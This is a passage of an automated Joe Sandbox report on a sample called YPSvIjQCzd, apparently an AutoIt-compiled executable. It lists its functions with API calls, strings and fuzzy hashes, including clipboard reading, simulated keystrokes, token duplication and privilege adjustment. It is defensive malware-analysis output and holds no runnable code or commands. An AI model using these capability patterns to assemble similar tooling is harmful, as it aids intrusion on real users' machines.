Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: 5410f81c7b1345e06589a757f186bb51d2de98593d01960fb24307c43dfd6446
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: B6E092B0104B009FDB348A24D8547E373E0FB06315F00081CF2DAD3341EBA6B8418759

Function 007D5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0080E16B,?,?,00000000), ref: 007D5DBF

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ef64c78cf13030fe7fa61ddcdf1c3f63c745dfd57476e72fa98b503c3daded5f
Instruction ID: e03f1f408f36e83c6b86c2895397eb39c46ed41a0afd312eba615ecd02afc872
Opcode Fuzzy Hash: ef64c78cf13030fe7fa61ddcdf1c3f63c745dfd57476e72fa98b503c3daded5f
Instruction Fuzzy Hash: 73D09E74640208BFE610DB80DC46FAA777CE705711F100194BE049629096B27D508695

Function 007F548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 007F5496

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: a70d08863a4f62d3b1bdd74e5cd7f4e2e56b177f578f09832beabbf55ac434c9
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: ABB0927684020CB7DE012E82EC02A693F199B40678F808020FB0C18262A677A6A09689

Function 0083D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 0083D46A

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 0dbc9254ab6a34eaf6df46bcc432e9ca909f8a074ba743d364c26fb1ae523088
Instruction ID: 25a83b6d1741f0eefb6cdeed4fae5eb60f0cd0e6a61af47461e3c3dad77689f1
Opcode Fuzzy Hash: 0dbc9254ab6a34eaf6df46bcc432e9ca909f8a074ba743d364c26fb1ae523088
Instruction Fuzzy Hash: 34713D30204702DFC714EF24D495A6AB7F4FF88314F044A6DF5969B3A2DB34A945CB92

Function 007F0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 007F0EF7

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: b9ddafcf543529c346a5d2ca5f35d1de054b7aa19ed156de4de96f4083941126
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 6031C471A00109DFC718EF58D480969F7A6FF59301B688AA5E50ACB752D735EDC1CBC0

Function 014F22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 014F22B1

Memory Dump Source

Source File: 00000001.00000002.1345357015.00000000014F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14f0000_YPSvIjQCzd.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: a39853f316097c7f6e2a640176c3d3883d52ae503dcedd02a279cac6b7874242
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 2EE0E67498110EDFDB00EFB8D6496AE7FB4EF04311F100165FD01D2281D6709D508A72

Non-executed Functions

Function 0085CDAC Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 637windowkeyboardnativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 0085CE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0085CE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0085CED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0085CF00
SendMessageW.USER32 ref: 0085CF29
_wcsncpy.LIBCMT ref: 0085CFA1
GetKeyState.USER32(00000011), ref: 0085CFC2
GetKeyState.USER32(00000009), ref: 0085CFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0085CFE5
GetKeyState.USER32(00000010), ref: 0085CFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0085D018
SendMessageW.USER32 ref: 0085D03F
SendMessageW.USER32(?,00001030,?,0085B602), ref: 0085D145
SetCapture.USER32(?), ref: 0085D177
ClientToScreen.USER32(?,?), ref: 0085D1DC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0085D203
ReleaseCapture.USER32 ref: 0085D20E
GetCursorPos.USER32(?), ref: 0085D248
ScreenToClient.USER32(?,?), ref: 0085D255
SendMessageW.USER32(?,00001012,00000000,?), ref: 0085D2B1
SendMessageW.USER32 ref: 0085D2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 0085D31C
SendMessageW.USER32 ref: 0085D34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0085D36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0085D37B
GetCursorPos.USER32(?), ref: 0085D39B
ScreenToClient.USER32(?,?), ref: 0085D3A8
GetParent.USER32(?), ref: 0085D3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 0085D431
SendMessageW.USER32 ref: 0085D462
ClientToScreen.USER32(?,?), ref: 0085D4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0085D4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 0085D51A
SendMessageW.USER32 ref: 0085D53D
ClientToScreen.USER32(?,?), ref: 0085D58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0085D5C3

Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC

GetWindowLongW.USER32(?,000000F0), ref: 0085D65F

Strings

@GUI_DRAGID, xrefs: 0085D1AA
F, xrefs: 0085D543

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 302779176-4164748364
Opcode ID: e8e1bbb9b019a39de917167bbae016a0a8d33a36a7758099b9afe97668b9c593
Instruction ID: 99f35c95db4a3e996c547d97d2fbd80857477fe8136fd5750dfa15a235a65b8b
Opcode Fuzzy Hash: e8e1bbb9b019a39de917167bbae016a0a8d33a36a7758099b9afe97668b9c593
Instruction Fuzzy Hash: 5942AD34204341AFDB21DF28C888EAABBF5FF48316F140529FA55D72A1D7319859CF92

Function 0085804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0085873F

Strings

%d/%02d/%02d, xrefs: 00858478

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: dcdc068dd2e7de2bcf888a330838b0ee249478dac4e89925673ec140f87e47b2
Instruction ID: d534a1e8a6d877a75bd53874952d169247d0373681466326af64ee9ea95ba67d
Opcode Fuzzy Hash: dcdc068dd2e7de2bcf888a330838b0ee249478dac4e89925673ec140f87e47b2
Instruction Fuzzy Hash: 7812B271500208EBEB259F64CC49FAB7BF8FF49716F10416AF915EA2A1EF748945CB10

Function 007E710E Relevance: 50.6, APIs: 19, Strings: 7, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007E75C2
_memset.LIBCMT ref: 007E76B1
_memmove.LIBCMT ref: 007E7C4B
_memmove.LIBCMT ref: 007E7E4F

Strings

[:<:]], xrefs: 007E75F1
Oa~, xrefs: 0082287E
\b(?=\w), xrefs: 00823C34
\b(?<=\w), xrefs: 00823C41
[:>:]], xrefs: 007E760A
DEFINE, xrefs: 008225AF
Q\E, xrefs: 007E81C1

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Oa~$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-2114839338
Opcode ID: cecd2240049ffabcca8bedb47829bb42bac0dd0805268ac01c529707488d9cef
Instruction ID: 2d94b6cedbb27fbd7139701284df4eb76ecd20cb55cccf2d05af9a41ff96d839
Opcode Fuzzy Hash: cecd2240049ffabcca8bedb47829bb42bac0dd0805268ac01c529707488d9cef
Instruction Fuzzy Hash: 0B93A271A00229DFDB28CF58D891BADB7B1FF48714F25816AE945EB280E7749EC1CB50

Function 007D4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 007D4A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0080DA8E
IsIconic.USER32(?), ref: 0080DA97
ShowWindow.USER32(?,00000009), ref: 0080DAA4
SetForegroundWindow.USER32(?), ref: 0080DAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0080DAC4
GetCurrentThreadId.KERNEL32 ref: 0080DACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 0080DAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 0080DAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 0080DAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 0080DAF8
SetForegroundWindow.USER32(?), ref: 0080DAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 0080DB10
keybd_event.USER32(00000012,00000000), ref: 0080DB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 0080DB25
keybd_event.USER32(00000012,00000000), ref: 0080DB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 0080DB33
keybd_event.USER32(00000012,00000000), ref: 0080DB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 0080DB42
keybd_event.USER32(00000012,00000000), ref: 0080DB47
SetForegroundWindow.USER32(?), ref: 0080DB4A
AttachThreadInput.USER32(?,?,00000000), ref: 0080DB71

Strings

Shell_TrayWnd, xrefs: 0080DA89

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 3c10e71fb6aba24db3ccdbd73f83f46f2e715458caa57eeb708c4ff460d227b4
Instruction ID: 9fa148b3fd7ab4de7be41489520c5f74881832c955da40a06156190514c8062a
Opcode Fuzzy Hash: 3c10e71fb6aba24db3ccdbd73f83f46f2e715458caa57eeb708c4ff460d227b4
Instruction Fuzzy Hash: 2C315071A80318BBEB216FA19C4AF7F7E6CFB44B61F114065FB05EB1D1D6B45D00AAA0

Function 0084425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0085F910), ref: 00844284
IsClipboardFormatAvailable.USER32(0000000D), ref: 00844292
GetClipboardData.USER32(0000000D), ref: 0084429A
CloseClipboard.USER32 ref: 008442A6
GlobalFix.KERNEL32(00000000), ref: 008442C2
CloseClipboard.USER32 ref: 008442CC
GlobalUnWire.KERNEL32(00000000), ref: 008442E1
IsClipboardFormatAvailable.USER32(00000001), ref: 008442EE
GetClipboardData.USER32(00000001), ref: 008442F6
GlobalFix.KERNEL32(00000000), ref: 00844303
GlobalUnWire.KERNEL32(00000000), ref: 00844337
CloseClipboard.USER32 ref: 00844447

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatWire$Open
String ID:
API String ID: 941120096-0
Opcode ID: 6207422b4677db97f8f138b98e9abb3a1056b9c2fd1c42b74f3493bb3441d54b
Instruction ID: 0c16cf2c18388a820168db2a48aad3d47fee7673f348e7f453d1649fbda6de39
Opcode Fuzzy Hash: 6207422b4677db97f8f138b98e9abb3a1056b9c2fd1c42b74f3493bb3441d54b
Instruction Fuzzy Hash: 0A51817120430AABD301AF64EC89F7E77A8FF84B01F10452AF656D32A2DB74D9048B62

Function 00828858 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00828CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00828D0D
Part of subcall function 00828CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00828D3A
Part of subcall function 00828CC3: GetLastError.KERNEL32 ref: 00828D47

_memset.LIBCMT ref: 0082889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008288ED
CloseHandle.KERNEL32(?), ref: 008288FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00828915
GetProcessWindowStation.USER32 ref: 0082892E
SetProcessWindowStation.USER32(00000000), ref: 00828938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00828952

Part of subcall function 00828713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00828851), ref: 00828728
Part of subcall function 00828713: CloseHandle.KERNEL32(?,?,00828851), ref: 0082873A

Strings

, xrefs: 008288AA
default, xrefs: 0082894D
winsta0, xrefs: 00828910

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 7719f0771f49622c3b95a8c64eb039e0e4718665e586151efc9f069fd891acaf
Instruction ID: 17adbff814623ad8880837aaf5ac8287508304df49d08c9d067e42ca94137d20
Opcode Fuzzy Hash: 7719f0771f49622c3b95a8c64eb039e0e4718665e586151efc9f069fd891acaf
Instruction Fuzzy Hash: 08814A71902229EFDF11DFA4EC49AEE7BB8FF04305F08412AF911E6261DF358A549B61

Function 0083C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0083C9F8
FindClose.KERNEL32(00000000), ref: 0083CA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0083CA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0083CA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 0083CAAF
__swprintf.LIBCMT ref: 0083CAFB
__swprintf.LIBCMT ref: 0083CB3E

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

__swprintf.LIBCMT ref: 0083CB92

Part of subcall function 007F38D8: __woutput_l.LIBCMT ref: 007F3931

__swprintf.LIBCMT ref: 0083CBE0

Part of subcall function 007F38D8: __flsbuf.LIBCMT ref: 007F3953
Part of subcall function 007F38D8: __flsbuf.LIBCMT ref: 007F396B

__swprintf.LIBCMT ref: 0083CC2F
__swprintf.LIBCMT ref: 0083CC7E
__swprintf.LIBCMT ref: 0083CCCD

Strings

%4d, xrefs: 0083CB38
%02d, xrefs: 0083CB86, 0083CB90, 0083CBDE, 0083CC2D, 0083CC7C, 0083CCCB
%4d%02d%02d%02d%02d%02d, xrefs: 0083CAF5

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 80c727e99c487b8aad4694dd51d0ef05ae03b665e91000b7ba79db0ede5dfdc3
Instruction ID: 0882995649e626a89df71256c3636a446883b53b89ea59c010558e3ee50c2d08
Opcode Fuzzy Hash: 80c727e99c487b8aad4694dd51d0ef05ae03b665e91000b7ba79db0ede5dfdc3
Instruction Fuzzy Hash: 15A132B1508315EBC714EB54C889DAFB7FCFF94704F40491AB685D7291EA38DA08C762

Function 0083F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0083F221
_wcscmp.LIBCMT ref: 0083F236
_wcscmp.LIBCMT ref: 0083F24D
GetFileAttributesW.KERNEL32(?), ref: 0083F25F
SetFileAttributesW.KERNEL32(?,?), ref: 0083F279
FindNextFileW.KERNEL32(00000000,?), ref: 0083F291
FindClose.KERNEL32(00000000), ref: 0083F29C
FindFirstFileW.KERNEL32(*.*,?), ref: 0083F2B8
_wcscmp.LIBCMT ref: 0083F2DF
_wcscmp.LIBCMT ref: 0083F2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 0083F308
SetCurrentDirectoryW.KERNEL32(0088A5A0), ref: 0083F326
FindNextFileW.KERNEL32(00000000,00000010), ref: 0083F330
FindClose.KERNEL32(00000000), ref: 0083F33D
FindClose.KERNEL32(00000000), ref: 0083F34F

Strings

*.*, xrefs: 0083F2B3

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: b03919ad2a3d1ef3d2472d1f58aabe662ed221c8f13b3c8bf275b99ff31af5e0
Instruction ID: bd308a813252ceb81390bf6d4af60ea2113d9ee4bacc5ad326de8dc4c893f8d5
Opcode Fuzzy Hash: b03919ad2a3d1ef3d2472d1f58aabe662ed221c8f13b3c8bf275b99ff31af5e0
Instruction Fuzzy Hash: 8131BA76900219AADB10EBB4DC49ADF73ACFF48361F144176FA14D32A1DB38DA45CAD0

Function 00850AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

